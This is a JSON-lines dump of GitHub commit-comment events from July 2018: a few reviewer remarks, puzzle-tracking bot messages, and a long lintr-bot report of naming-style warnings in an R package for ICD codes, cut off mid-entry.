{"id":"7993591234","type":"CommitCommentEvent","actor":{"login":"lijingjie"},"repo":{"name":"phusion/passenger"},"payload":{"comment":{"id":29775590,"position":null,"line":null,"path":null,"commit_id":"0766bb303ad8009c6061206f3aafe231c4f1c3ff","created_at":"2018-07-20T08:17:06Z","updated_at":"2018-07-20T08:17:06Z","author_association":"NONE","body":"Thanks for working on this issue. ^_^"}},"created_at":"2018-07-20T08:17:06Z"}
{"id":"7993593133","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29775593,"position":null,"line":null,"path":null,"commit_id":"29ca6fb9b6f7e66d05df77178e74695a220b6fe5","created_at":"2018-07-20T08:17:31Z","updated_at":"2018-07-20T08:17:31Z","author_association":"COLLABORATOR","body":"Puzzle `540-880d3ffd` disappeared from [`src/main/java/com/zerocracy/pmo/Negligence.java`](https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/Negligence.java), that's why I closed #1141. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-20T08:17:31Z"}
{"id":"7993594940","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zerocracy/farm"},"payload":{"comment":{"id":29775596,"position":null,"line":null,"path":null,"commit_id":"29ca6fb9b6f7e66d05df77178e74695a220b6fe5","created_at":"2018-07-20T08:17:53Z","updated_at":"2018-07-20T08:17:53Z","author_association":"COLLABORATOR","body":"Puzzle `1141-7253381b` discovered in   [`src/main/java/com/zerocracy/pmo/Negligence.java`](  https://github.com/zerocracy/farm/blob/master/src/main/java/com/zerocracy/pmo/Negligence.java)   and submitted as #1450. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-20T08:17:53Z"}
{"id":"7993598401","type":"CommitCommentEvent","actor":{"login":"Kyrixx"},"repo":{"name":"Essindraa/DTK-client"},"payload":{"comment":{"id":29775608,"position":29,"line":19,"path":"src/js/components/Chat/MessageInput.js","commit_id":"e3787d4b1fe160f1771df77874ff2d964473567a","created_at":"2018-07-20T08:18:40Z","updated_at":"2018-07-20T08:18:40Z","author_association":"NONE","body":"N'hésites pas a mettre tes attributs à la ligne \r\n```\r\n<input \r\n   className=\"Input\" \r\n   placeholder=\"Taper message\" \r\n   onChange={(event) => { this.state.message = event.target.value}}\r\n/>\r\n```\r\n\r\nTu gagnes en lisibilité dans ton fichier"}},"created_at":"2018-07-20T08:18:40Z"}
{"id":"7993599951","type":"CommitCommentEvent","actor":{"login":"SushiTee"},"repo":{"name":"TUD-INF-IAI-MCI/AGSBS-infrastructure"},"payload":{"comment":{"id":29775617,"position":47,"line":132,"path":"MAGSBS/pandoc/contentfilter.py","commit_id":"a8a1b76ba2b12c4de2bfeb161fe7718bb832e2c1","created_at":"2018-07-20T08:19:02Z","updated_at":"2018-07-20T08:19:02Z","author_association":"COLLABORATOR","body":"I accidentally reverted this commit. Sorry, but this braces are needed there. Otherwise it is invalid syntax."}},"created_at":"2018-07-20T08:19:02Z"}
{"id":"7993601746","type":"CommitCommentEvent","actor":{"login":"kapoorsanj"},"repo":{"name":"kapoorsanj/First_Class"},"payload":{"comment":{"id":29775626,"position":null,"line":null,"path":null,"commit_id":"c31e3e4467a6611925c32fe758d4d2f0d59887ab","created_at":"2018-07-20T08:19:26Z","updated_at":"2018-07-20T08:19:26Z","author_association":"OWNER","body":"The else statement was truly incomplete."}},"created_at":"2018-07-20T08:19:26Z"}
{"id":"7993602632","type":"CommitCommentEvent","actor":{"login":"Kyrixx"},"repo":{"name":"Essindraa/DTK-client"},"payload":{"comment":{"id":29775629,"position":5,"line":4,"path":"src/registerServiceWorker.js","commit_id":"e3787d4b1fe160f1771df77874ff2d964473567a","created_at":"2018-07-20T08:19:39Z","updated_at":"2018-07-20T08:19:39Z","author_association":"NONE","body":"Quand tu as un reminder quand ca, commence le commentaire par `// TODO : ` , ton IDE le mettera dans une couleur particuliere"}},"created_at":"2018-07-20T08:19:39Z"}
{"id":"7993603250","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":29775632,"position":null,"line":null,"path":null,"commit_id":"be7a3a78849743f63bcb1a4d751f996d943205bf","created_at":"2018-07-20T08:19:47Z","updated_at":"2018-07-20T08:19:47Z","author_association":"NONE","body":"[R/as_char_no_warn.R:27:12:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/as_char_no_warn.R#L27) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return(fastIntToStringRcpp(x))\n           ^~~~~~~~~~~~~~~~~~~\n```\n[R/categorize.R:63:39:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/categorize.R#L63) *style:* **Variable and function names should be all lowercase.**\n```r\n​                       comorbid_fun = comorbidMatMul,\n                                      ^~~~~~~~~~~~~~\n```\n[R/categorize.R:177:46:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/categorize.R#L177) *style:* **Variable and function names should be all lowercase.**\n```r\n​                              comorbid_fun = comorbidMatMulSimple,\n                                             ^~~~~~~~~~~~~~~~~~~~\n```\n[R/comorbid.R:215:42:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/comorbid.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​                          comorbid_fun = comorbidMatMulSimple,\n                                         ^~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:132:1:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/guess.R#L132) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​guess_version.data.frame <- function(x, short_code = NULL, icd_name = NULL, ...) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/guess.R:191:10:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/guess.R#L191) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​  ver <- guess_version.data.frame(x, icd_name = icd_name)\n         ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/parse.R:268:10:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/parse.R#L268) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"740\", \"759\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:270:10:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/parse.R#L270) *style:* **Variable and function names should be all lowercase.**\n```r\n​  out <- fixSubchapterNa(out, \"280\", \"289\")\n         ^~~~~~~~~~~~~~~\n```\n[R/parse.R:304:1:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/parse.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​fixSubchapterNa <- function(x, start, end) {\n^~~~~~~~~~~~~~~\n```\n[R/score.R:74:1:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/score.R#L74) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​charlson.data.frame <- function(x, visit_name = NULL,\n^~~~~~~~~~~~~~~~~~~\n```\n[R/score.R:308:1:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/score.R#L308) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​van_walraven.data.frame <- function(x, visit_name = NULL, return_df = FALSE,\n^~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/util.R:189:1:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/R/util.R#L189) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​get_visit_name.data.frame <- function(x, visit_name = NULL) {\n^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:606:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L606) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:616:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L616) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 1, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:617:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L617) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:620:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L620) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 2, chunk_size = 32),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:621:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L621) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 5, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:624:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L624) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:625:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L625) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 3, chunk_size = 32)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:628:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L628) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:629:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L629) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:632:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L632) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts - 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:633:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L633) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:636:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L636) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts + 1),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:637:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L637) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\", threads = 4, chunk_size = upts)\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-comorbid-maps-icd9.R:652:5:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-comorbid-maps-icd9.R#L652) *style:* **Variable and function names should be all lowercase.**\n```r\n​    icd9ComorbidShortCpp(pts, ac, visitId = \"visit_id\", icd9Field = \"icd9Field\"),\n    ^~~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:284:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L284) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:285:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L285) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:286:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L286) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"1\")), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:287:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L287) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", NA), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:288:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L288) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"\"), \"100\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:289:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L289) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToDecimal(\"100\", \"1\"), \"100.1\")\n               ^~~~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:295:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L295) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfempty), character())\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:296:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L296) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(dfe2), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:297:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L297) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"trout\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:298:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L298) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"23\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:299:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L299) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = \"\")), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:300:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L300) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = NA, mnr = NA)), NA_character_)\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:309:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L309) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = mn)), \"100\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:310:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L310) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:311:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L311) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = mn)), \"010\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:312:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L312) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:313:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L313) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:314:18:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L314) *style:* **Variable and function names should be all lowercase.**\n```r\n​    expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = mn)), \"001\")\n                 ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:319:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L319) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"1\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:320:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L320) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"01\", mnr = \"23\", stringsAsFactors = TRUE)), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:321:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L321) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"001\", mnr = \"23\")), \"00123\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:322:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L322) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"10\", mnr = \"23\", stringsAsFactors = TRUE)), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:323:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L323) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"010\", mnr = \"23\")), \"01023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:324:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L324) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToShort(list(mjr = \"100\", mnr = \"23\", stringsAsFactors = TRUE)), \"10023\")\n               ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:329:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L329) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:331:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L331) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:333:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L333) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V1\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:334:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L334) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"\", NA)), c(\"V01\", \"V01\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:338:20:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L338) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(icd9MajMinToShort(c(\"100\", \"200\"), c(\"10\", \"20\")),\n                   ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:343:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L343) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\", \"56\"), c(\"1\", \"20\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:346:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L346) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:351:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L351) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(c(\"123\", \"34\"), c(\"1\", \"20\", \"45\")),\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:357:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L357) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(10L, \"20\"), \"01020\")\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:358:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L358) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V10\", c(\"0\", \"1\")), c(\"V100\", \"V101\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-convert.R:359:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-convert.R#L359) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9MajMinToShort(\"V01\", c(\"0\", \"1\")), c(\"V010\", \"V011\"))\n               ^~~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:46:20:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-util.R#L46) *style:* **Variable and function names should be all lowercase.**\n```r\n​                   trimCpp(c(\"123\", \" a s d f \")))\n                   ^~~~~~~\n```\n[tests/tests-deprecated/test-util.R:65:40:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-util.R#L65) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_identical(strim(\" a s d f \"), strimCpp(\" a s d f \"))\n                                       ^~~~~~~~\n```\n[tests/tests-deprecated/test-util.R:147:9:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-util.R#L147) *style:* **Variable and function names should be all lowercase.**\n```r\n​  rs <- icd9RandomShort(1000)\n        ^~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:469:8:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-valid.R#L469) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortN(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:474:8:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-valid.R#L474) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortV(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/tests-deprecated/test-valid.R:479:8:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/tests-deprecated/test-valid.R#L479) *style:* **Variable and function names should be all lowercase.**\n```r\n​  x <- icd9RandomShortE(100)\n       ^~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:304:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L304) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = NA)), \"100\")\n               ^~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-convert.R:305:16:](https://github.com/jackwasey/icd/blob/be7a3a78849743f63bcb1a4d751f996d943205bf/tests/testthat/test-convert.R#L305) *style:* **Variable and function names should be all lowercase.**\n```r\n​  expect_equal(icd9PartsToDecimal(data.frame(mjr = \"100\", mnr = \"\")), 